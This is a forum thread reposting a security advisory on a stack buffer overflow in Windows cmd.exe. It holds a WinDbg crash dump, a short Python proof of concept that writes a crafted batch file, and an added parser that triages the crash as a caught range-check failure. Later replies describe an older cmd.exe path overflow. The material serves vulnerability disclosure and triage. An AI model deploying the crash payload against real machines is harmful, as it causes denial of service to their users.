Windows cmd.exe overflow vulnerability

    Posted on 2021-9-24 21:47:34
    # Title: Microsoft Windows cmd.exe - Stack Buffer Overflow
    # Author: John Page (aka hyp3rlinx)
    # Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
    # ISR: ApparitionSec
     
    [Vendor]
    www.microsoft.com
     
     
    [Product]
    cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems. 
     
     
    [Vulnerability Type]
    Stack Buffer Overflow
     
     
    [CVE Reference]
    N/A
     
     
    [Security Issue]
    A specially crafted payload will trigger a stack buffer overflow in the Windows NT "cmd.exe" command-line interpreter. It requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments via the /c or /k flags, which execute commands specified by a string, that will also trigger the buffer overflow condition.
     
    E.g. cmd.exe /c <PAYLOAD>
     
    [Memory Dump]
    (660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available)
    ntdll!ZwWaitForMultipleObjects+0x14:
    00007ffb`00a809d4 c3              ret
     
     
    0:000> .ecxr
    rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0
    rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c
    rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0
    r8=000000000000200c  r9=00007ff7c0e60520 r10=0000000000000000
    r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002
    r14=000002e34d796890 r15=000000000000200d
    iopl=0         nv up ei pl nz na pe nc
    cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
    cmd!StripQuotes+0xa8:
    00007ff7`c0e214f8 cc              int     3
     
    0:000> !analyze -v
    *******************************************************************************
    *                                                                             *
    *                        Exception Analysis                                   *
    *                                                                             *
    *******************************************************************************
     
    Failed calling InternetOpenUrl, GLE=12029
     
    FAULTING_IP: 
    cmd!StripQuotes+a8
    00007ff7`c0e214f8 cc              int     3
     
     
    EXCEPTION_RECORD:  ffffffffffffffff -- (.exr 0xffffffffffffffff)
    ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
       ExceptionCode: c0000409 (Stack buffer overflow)
      ExceptionFlags: 00000001
    NumberParameters: 1
       Parameter[0]: 0000000000000008
     
    PROCESS_NAME:  cmd.exe
     
    ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
     
    EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.
     
    EXCEPTION_PARAMETER1:  0000000000000008
     
    MOD_LIST: <ANALYSIS/>
     
    NTGLOBALFLAG:  0
     
    APPLICATION_VERIFIER_FLAGS:  0
     
    FAULTING_THREAD:  00000000000012d4
     
    BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE
     
    PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE
     
    DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE
     
    LAST_CONTROL_TRANSFER:  from 00007ffafcfca9c6 to 00007ffb00a809d4
     
    STACK_TEXT:  
    000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14
    000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106
    000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe
    000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce
    000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73
    000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b
    000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
    000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2
    000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8
    000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443
    000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69
    000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de
    000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5
    000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa
    000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289
    000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
    000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
     
    FOLLOWUP_IP: 
    cmd!StripQuotes+a8
    00007ff7`c0e214f8 cc              int     3
     
    SYMBOL_STACK_INDEX:  8
     
    SYMBOL_NAME:  cmd!StripQuotes+a8
     
    FOLLOWUP_NAME:  MachineOwner
     
    MODULE_NAME: cmd
     
    IMAGE_NAME:  cmd.exe
     
    DEBUG_FLR_IMAGE_TIMESTAMP:  0
     
    STACK_COMMAND:  ~0s ; kb
     
    FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes
     
    BUCKET_ID:  X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8
     
     
    [Exploit/POC]
    # Payload: byte 0xEB (chr(235)) followed by "\CC", repeated 3000 times,
    # written out as the batch file hate.cmd
    PAYLOAD = chr(235) + "\\CC"
    PAYLOAD = PAYLOAD * 3000
     
    with open("hate.cmd", "w") as f:
        f.write(PAYLOAD)
     
     
    [Network Access]
    Local
     
     
    [Video PoC URL]
    https://www.youtube.com/watch?v=wYYgjV-PzD8
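    As an added triage example (not part of the advisory or of this post): a small Python parser for the `!analyze -v` text quoted above. It pulls out the exception code, the FAST_FAIL sub-code carried in Parameter[0], the faulting symbol, the bucket and the STACK_TEXT frames, then checks whether the stack passes through the MSVC runtime security-check routines. The sample input is a constructed excerpt of the dump above; the FAST_FAIL code names are the constants from winnt.h.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed sample: a trimmed excerpt of the "!analyze -v" output quoted in
# the post above (only the fields this parser uses are kept).
SAMPLE_DUMP = """\
FAULTING_IP: 
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc              int     3

EXCEPTION_RECORD:  ffffffffffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
   ExceptionCode: c0000409 (Stack buffer overflow)
  ExceptionFlags: 00000001
NumberParameters: 1
   Parameter[0]: 0000000000000008

PROCESS_NAME:  cmd.exe

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application.

STACK_TEXT:  
000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14
000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b
000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2
000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8
000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443
000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa

SYMBOL_NAME:  cmd!StripQuotes+a8

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes
"""

# FAST_FAIL_* constants from winnt.h; Parameter[0] of a 0xC0000409 exception
# carries one of them and says which runtime check fired.
FAST_FAIL_CODES = {
    0: "LEGACY_GS_VIOLATION",
    2: "STACK_COOKIE_CHECK_FAILURE",
    8: "RANGE_CHECK_FAILURE",
    10: "GUARD_ICALL_CHECK_FAILURE",
}

# MSVC runtime routines a compiler-inserted security check passes through
# before the process is terminated.
SECURITY_CHECK_ROUTINES = (
    "_report_gsfailure",
    "_report_rangecheckfailure",
    "_raise_securityfailure",
    "__fastfail",
)

# "KEY: value" lines of the analysis, including indexed keys like Parameter[0]
FIELD_RE = re.compile(r"^\s*([A-Za-z_]\w*(?:\[\d+\])?):\s*(.*?)\s*$")
# one STACK_TEXT frame: child-sp retaddr : 4 args : symbol
FRAME_RE = re.compile(
    r"^\s*[0-9a-f`]{16,}\s+[0-9a-f`]{16,}\s+:(?:\s+[0-9a-f`]{16,}){4}\s+:\s+(\S+)\s*$"
)


@dataclass
class CrashSummary:
    exception_code: str = ""
    fast_fail_code: Optional[int] = None
    faulting_symbol: str = ""
    failure_bucket: str = ""
    frames: List[str] = field(default_factory=list)

    @property
    def security_check_fired(self) -> bool:
        """True when a runtime security-check routine is on the stack."""
        return any(any(r in f for r in SECURITY_CHECK_ROUTINES) for f in self.frames)

    def verdict(self) -> str:
        if self.exception_code != "c0000409":
            return "not a fast-fail abort; inspect the faulting instruction directly"
        reason = FAST_FAIL_CODES.get(self.fast_fail_code, f"fast-fail code {self.fast_fail_code}")
        if self.security_check_fired:
            return (f"{reason}: the runtime check terminated the process before any control "
                    f"transfer; treat as a memory-safety bug caught by the mitigation (crash/DoS), "
                    f"not as a demonstrated hijack, whatever the EXPLOITABLE bucket says")
        return f"0xC0000409 ({reason}) without a visible check routine on the stack; review manually"


def parse_analyze_output(text: str) -> CrashSummary:
    """Parse the text of `!analyze -v` into a CrashSummary."""
    summary = CrashSummary()
    in_stack = False
    for line in text.splitlines():
        if in_stack:
            m = FRAME_RE.match(line)
            if m:
                summary.frames.append(m.group(1))
                continue
            in_stack = False  # first non-frame line closes STACK_TEXT
        m = FIELD_RE.match(line)
        if not m:
            continue
        key, value = m.groups()
        if key == "ExceptionCode":
            summary.exception_code = value.split()[0].lower()
        elif key == "Parameter[0]":
            summary.fast_fail_code = int(value, 16)
        elif key == "SYMBOL_NAME":
            summary.faulting_symbol = value
        elif key == "FAILURE_BUCKET_ID":
            summary.failure_bucket = value
        elif key == "STACK_TEXT":
            in_stack = True
    return summary


def first_app_frame(summary: CrashSummary) -> Optional[str]:
    """The application frame that invoked the runtime check: the frame just
    below the deepest security-check routine on the stack."""
    last_check = -1
    for i, frame in enumerate(summary.frames):
        if any(r in frame for r in SECURITY_CHECK_ROUTINES):
            last_check = i
    if last_check < 0 or last_check + 1 >= len(summary.frames):
        return None
    return summary.frames[last_check + 1]


if __name__ == "__main__":
    s = parse_analyze_output(SAMPLE_DUMP)
    print(s.exception_code, s.fast_fail_code, s.faulting_symbol)
    print("check fired in:", first_app_frame(s))
    print(s.verdict())
```

    On the dump above this yields Parameter[0] = 8, i.e. FAST_FAIL_RANGE_CHECK_FAILURE, which matches the `cmd!_report_rangecheckfailure` frame directly below `cmd!StripQuotes+0xa8`: the overrun was detected by the compiler-inserted range check and the process was terminated, which is what the 0xC0000409 status means. The "EXPLOITABLE" bucket is WinDbg's coarse heuristic for the status code, not evidence of control-flow hijack, so a triage note should record the check that fired and the application frame it fired in.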

    Posted on 2021-9-25 00:44:59
    Windows NT and 2000 are operating systems developed and maintained by Microsoft. The cmd.exe used in Windows NT and 2000 does not correctly handle paths longer than 256 characters; a local attacker can exploit this to cause a buffer overflow or to make the cd (change directory) command fail. The NTFS file system allows paths of unlimited length, while the Windows API only allows paths of up to 256 bytes. cmd.exe under Windows NT and 2000 cannot correctly handle a path containing 256 characters: if the cd command is used to change into a subdirectory longer than 256 characters, a buffer overflow occurs on Windows NT 4.0, with the possibility of executing arbitrary instructions, while on Windows 2000 it causes the cd command to fail.
    Posted on 2021-10-7 09:37:54
    owo, so even cmd can overflow these days...